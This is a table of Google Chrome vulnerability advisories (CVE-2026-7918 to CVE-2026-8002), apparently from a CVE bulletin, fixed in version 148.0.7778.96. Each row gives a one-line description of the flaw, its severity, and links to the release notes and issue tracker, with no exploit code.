| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7918 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498780188 |
| Google--Chrome | Use after free in Aura in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7919 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498832921 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7920 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498989348 |
| Google--Chrome | Use after free in Passwords in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7921 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499062376 |
| Google--Chrome | Use after free in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7922 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499449324 |
| Google--Chrome | Out of bounds write in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7923 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500080194 |
| Google--Chrome | Uninitialized Use in Dawn in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7924 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/500087204 |
| Google--Chrome | Use after free in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7925 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501833981 |
| Google--Chrome | Use after free in PresentationAPI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7926 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502249087 |
| Google--Chrome | Type Confusion in Runtime in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7927 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/502830119 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7928 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504612429 |
| Google--Chrome | Use after free in MediaRecording in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-06 | not yet calculated | CVE-2026-7929 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/504660052 |
| Google--Chrome | Insufficient validation of untrusted input in Cookies in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform privilege escalation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7930 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/434825208 |
| Google--Chrome | Insufficient validation of untrusted input in iOS in Google Chrome on iOS prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7931 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/474338157 |
| Google--Chrome | Insufficient policy enforcement in Downloads in Google Chrome prior to 148.0.7778.96 allowed a local attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7932 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/481634116 |
| Google--Chrome | Out of bounds read in WebCodecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted video file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7933 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/488585490 |
| Google--Chrome | Insufficient validation of untrusted input in Popup Blocker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7934 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489023922 |
| Google--Chrome | Inappropriate implementation in Speech in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7935 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/489624550 |
| Google--Chrome | Object lifecycle issue in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7936 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/490485402 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7937 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491766258 |
| Google--Chrome | Use after free in CSS in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7938 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492735384 |
| Google--Chrome | Inappropriate implementation in SanitizerAPI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7939 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/492963096 |
| Google--Chrome | Use after free in V8 in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7940 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493631402 |
| Google--Chrome | Insufficient validation of untrusted input in Mobile in Google Chrome on Android prior to 148.0.7778.96 allowed a local attacker to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7941 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493955234 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7942 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495363705 |
| Google--Chrome | Insufficient validation of untrusted input in ANGLE in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7943 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495373657 |
| Google--Chrome | Insufficient validation of untrusted input in Persistent Cache in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7944 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495783187 |
| Google--Chrome | Insufficient validation of untrusted input in COOP in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7945 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495802788 |
| Google--Chrome | Insufficient policy enforcement in WebUI in Google Chrome on Linux, Mac, Windows, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7946 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496016840 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7947 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496169594 |
| Google--Chrome | Race in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7948 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496193452 |
| Google--Chrome | Out of bounds read in Skia in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7949 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496206134 |
| Google--Chrome | Out of bounds read and write in GFX in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform arbitrary read/write via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7950 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496259890 |
| Google--Chrome | Out of bounds write in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7951 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496266456 |
| Google--Chrome | Insufficient policy enforcement in Extensions in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass discretionary access control via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7952 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496279876 |
| Google--Chrome | Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7953 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496379792 |
| Google--Chrome | Race in Shared Storage in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7954 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496380960 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7955 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496441232 |
| Google--Chrome | Use after free in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7956 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496463315 |
| Google--Chrome | Out of bounds write in Media in Google Chrome on Mac, iOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7957 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496607380 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to inject arbitrary scripts or HTML (UXSS) via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7958 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496632973 |
| Google--Chrome | Inappropriate implementation in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7959 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/496645205 |
| Google--Chrome | Race in Speech in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7960 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497007825 |
| Google--Chrome | Insufficient validation of untrusted input in Permissions in Google Chrome prior to 148.0.7778.96 allowed an attacker on the local network segment to leak cross-origin data via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7961 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497008295 |
| Google--Chrome | Insufficient policy enforcement in DirectSockets in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to perform arbitrary read/write via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7962 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497081987 |
| Google--Chrome | Inappropriate implementation in ServiceWorker in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7963 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497250399 |
| Google--Chrome | Insufficient validation of untrusted input in FileSystem in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7964 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497254383 |
| Google--Chrome | Insufficient validation of untrusted input in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7965 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497255035 |
| Google--Chrome | Insufficient validation of untrusted input in SiteIsolation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7966 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497341787 |
| Google--Chrome | Insufficient validation of untrusted input in Navigation in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7967 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497365545 |
| Google--Chrome | Insufficient validation of untrusted input in CORS in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7968 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497432281 |
| Google--Chrome | Integer overflow in Network in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7969 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497450574 |
| Google--Chrome | Use after free in TopChrome in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7970 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497487462 |
| Google--Chrome | Inappropriate implementation in ORB in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7971 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497529290 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7972 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497546281 |
| Google--Chrome | Integer overflow in Dawn in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7973 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497565944 |
| Google--Chrome | Use after free in Blink in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7974 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497649372 |
| Google--Chrome | Use after free in DevTools in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7975 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497735587 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.96 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7976 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497736679 |
| Google--Chrome | Inappropriate implementation in Canvas in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7977 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497821223 |
| Google--Chrome | Inappropriate implementation in Companion in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to perform OS-level privilege escalation via malicious network traffic. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7978 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497828892 |
| Google--Chrome | Inappropriate implementation in Media in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7979 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497849876 |
| Google--Chrome | Use after free in WebAudio in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7980 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497859275 |
| Google--Chrome | Out of bounds read in Codecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7981 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497926602 |
| Google--Chrome | Uninitialized Use in WebCodecs in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7982 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497952533 |
| Google--Chrome | Out of bounds read in Dawn in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7983 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/497975608 |
| Google--Chrome | Use after free in ReadingMode in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7984 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498277368 |
| Google--Chrome | Use after free in GPU in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7985 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498352423 |
| Google--Chrome | Insufficient policy enforcement in Autofill in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7986 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498396238 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7987 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498696266 |
| Google--Chrome | Type Confusion in WebRTC in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7988 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498753456 |
| Google--Chrome | Insufficient data validation in DataTransfer in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7989 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498765082 |
| Google--Chrome | Insufficient validation of untrusted input in Updater in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7990 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/498892267 |
| Google--Chrome | Use after free in UI in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7991 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499065126 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome on Linux, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7992 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499067529 |
| Google--Chrome | Insufficient validation of untrusted input in Payments in Google Chrome on Android prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7993 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499099003 |
| Google--Chrome | Inappropriate implementation in Chromoting in Google Chrome on Windows prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7994 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/499116954 |
| Google--Chrome | Out of bounds read in AdFilter in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-06 | not yet calculated | CVE-2026-7995 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/501745798 |
| Google--Chrome | Insufficient validation of untrusted input in SSL in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7996 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/484547631 |
| Google--Chrome | Insufficient validation of untrusted input in Updater in Google Chrome on Mac prior to 148.0.7778.96 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7997 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/487960705 |
| Google--Chrome | Insufficient validation of untrusted input in Dialog in Google Chrome prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7998 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/491676472 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 148.0.7778.96 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-7999 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/493099941 |
| Google--Chrome | Insufficient validation of untrusted input in ChromeDriver in Google Chrome on Windows prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8000 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494464734 |
| Google--Chrome | Use After Free in Printing in Google Chrome on Linux, Mac, ChromeOS prior to 148.0.7778.96 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8001 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/494764371 |
| Google--Chrome | Use after free in Audio in Google Chrome on Mac prior to 148.0.7778.96 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Low) | 2026-05-06 | not yet calculated | CVE-2026-8002 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop.html https://issues.chromium.org/issues/495779613 |
